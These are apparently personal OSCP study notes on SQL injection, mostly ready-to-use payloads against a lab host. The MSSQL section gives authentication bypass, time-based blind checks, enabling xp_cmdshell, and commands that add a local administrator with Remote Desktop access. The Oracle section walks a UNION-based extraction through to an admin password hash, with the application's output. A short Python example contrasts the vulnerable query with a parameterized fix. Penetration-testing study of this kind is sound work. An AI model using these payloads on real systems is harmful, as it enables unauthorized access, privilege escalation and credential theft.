OSCP Notes

SQL Injection

MSSQL

- Full MSSQL Injection PWNage (Exploit Database)
- Union based Oracle Injection (www.securityidiots.com)
- What is Blind SQL Injection? Tutorial & Examples | Web Security Academy (PortSwigger)
- MSSQL Injection Cheat Sheet (pentestmonkey)
- Using SQL Injection to Bypass Authentication (portswigger.net)

Last updated 3 years ago

## MSSQL INJECTION EXAMPLE

### LOGIN-FORM

Auth bypass and time-based (blind) confirmation through the `psw` parameter:

```
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test' or '1'='1
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; IF (1=1) WAITFOR DELAY '0:0:10'--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; WAITFOR DELAY '0:0:10'--
```

Enable xp_cmdshell via sp_configure (stacked queries):

```
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'show advanced options', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_configure 'xp_cmdshell', 1;--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; RECONFIGURE;--
```

OS command execution through xp_cmdshell (adds a local user to Administrators and Remote Desktop Users):

```
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net user gerh Pass123 /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup Administrators gerh /add';--
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" gerh /add';--
```

Add a SQL Server login:

```
http://10.10.10.111:4167/loginform.asp?uname=Gerh&psw=test'; EXEC sp_addlogin 'user', 'pass';--
```
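Why the login form above falls to `psw=test' or '1'='1`, shown as an added example (not the notes' own code): the string-built query beside the parameterized version that fixes it. An in-memory SQLite database stands in for the MSSQL server (an assumption), and the users table is constructed.

```python
import sqlite3

# Constructed stand-in for the loginform.asp backend. SQLite plays the role
# of MSSQL here (assumption); the tautology payload behaves the same on both.
SAMPLE_USERS = [("Gerh", "s3cret"), ("alice", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, psw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(uname, psw):
    # The defect: request parameters are concatenated into the SQL text, so a
    # quote in psw closes the string literal and the rest is parsed as SQL.
    return ("SELECT COUNT(*) FROM users WHERE uname='" + uname +
            "' AND psw='" + psw + "'")


def login_vulnerable(conn, uname, psw):
    return conn.execute(build_vulnerable_sql(uname, psw)).fetchone()[0] > 0


def login_parameterized(conn, uname, psw):
    # The fix: placeholders. Values travel separately from the statement, so
    # quotes, semicolons and '--' inside psw stay plain data.
    sql = "SELECT COUNT(*) FROM users WHERE uname=? AND psw=?"
    return conn.execute(sql, (uname, psw)).fetchone()[0] > 0


def compare(uname, psw):
    """Run both login paths on the same input; returns (vulnerable, fixed)."""
    conn = make_db()
    try:
        return (login_vulnerable(conn, uname, psw),
                login_parameterized(conn, uname, psw))
    finally:
        conn.close()


if __name__ == "__main__":
    # Payload from the notes: psw=test' or '1'='1
    print(build_vulnerable_sql("Gerh", "test' or '1'='1"))
    print(compare("Gerh", "test' or '1'='1"))   # (True, False)
    print(compare("Gerh", "s3cret"))            # (True, True)
```

SQLite's execute() refuses stacked statements, so the WAITFOR and xp_cmdshell chains above cannot be replayed here; `build_vulnerable_sql` still shows they would reach the engine verbatim on a server that accepts them.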
## ORACLE INJECTION EXAMPLE

Find the column count with ORDER BY, then enumerate version, tables, columns and data with UNION SELECT (the application's output is shown under each payload):

```
' or '1'='1
' order by 3--
' order by 4-- == RETURNS ERROR
' UNION SELECT 1, 1, 1--
' UNION SELECT 1, 1, 1 from dual--
' UNION SELECT null, null, null from dual--

' UNION SELECT 'XXX', 'ZZZ', null from dual--

' UNION SELECT 'XXX', sys.database_name, null from dual--
Blog entry from XXX with title XE from 0

' UNION SELECT 'XXX', (select banner from v$version where rownum=1), null from dual--
Blog entry from XXX with title Oracle Database 18c Express Edition Release 18.0.0.0.0 - Production from 0

' UNION SELECT 'XXX', table_name, null from all_tables--
Blog entry from XXX with title ALL_UNIFIED_AUDIT_ACTIONS from 0
Blog entry from XXX with title AUDIT_ACTIONS from 0
Blog entry from XXX with title AV_DUAL from 0
Blog entry from XXX with title AW$AWCREATE from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_USERS'--
Blog entry from XXX with title PASSWORD from 0
Blog entry from XXX with title USER_ID from 0
Blog entry from XXX with title USER_NAME from 0

' UNION SELECT 'XXX', column_name, null from all_tab_columns where table_name='WEB_ADMINS'--
Blog entry from XXX with title ADMIN_ID from 0
Blog entry from XXX with title ADMIN_NAME from 0
Blog entry from XXX with title PASSWORD from 0

' UNION SELECT 'XXX', ADMIN_NAME||PASSWORD, null from WEB_ADMINS--
Blog entry from XXX with title admind82494f05d6917ba02f7aaa29689ccb444bb73f20380876cb05d1f37537b7892 from 0
```